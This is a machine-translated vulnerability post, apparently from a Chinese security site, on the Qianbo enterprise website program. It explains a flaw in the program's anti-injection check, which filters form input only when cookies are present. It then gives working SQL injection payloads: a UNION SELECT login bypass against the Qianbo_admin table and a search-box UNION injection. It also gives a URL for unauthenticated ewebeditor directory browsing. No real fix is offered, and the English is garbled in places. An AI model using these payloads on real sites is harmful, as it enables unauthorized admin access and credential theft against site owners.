An anti-injection of a noob error-thousand Bo enterprise program-vulnerability warning-the black bar safety net

ID MYHACK58:62201233270
Type myhack58
Reporter 佚名
Modified 2012-03-06T00:00:00


Thousand Bo enterprise Station program, anti-injected into the statement where there is a little error!

Detail: If EnableStopInjection = True Then

If Request. QueryString <> "" Then Call StopInjection(Request. QueryString)

If Request. Cookies <> "" Then Call StopInjection(Request. Cookies)

If Request. Cookies <> "" Then Call StopInjection2(Request. Form)

End If


Anti-start of injection or Encode, through the Echo of their decoding process, only to find out that here the surface of the cookie is empty the judge twice. Resulting in a Form of a malicious character submission.

Vulnerability to prove: a tasteless front Desk user login Md5 value is 1, The statement is written in the user name, the password write 1

'UNION Select 1,1,1,'a0b923820dcc509a',1,1,1,1,1,1,1,1,1,1,1,1,1,1,true,1,1,1 FROM Qianbo_admin Where "='

This tasteless the front landing can only reach the MemberLogin. asp 4 8 rows

If The UCase(LoginName) = The UCase(MemName) And LoginPassword = Password

LoginName take is just that the string statement, and the query results the user name is 1 so card in here.

================================================================= /system/ewebeditor/asp/browse. asp? action=FOLDER&style=coolblue&cusdir=dir&type=FILE

Background ewebeditor not doing permissions verify, can lead visitors directly to browse

FCK can also be a column directory with local Test even on their Fck


The search box, enter

%' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from Qianbo_admin where '%'='


A bunch of tasteless.

Repair solutions:

A variety of repair Ah, you know everything!!!

Author B1uH4ck@clouds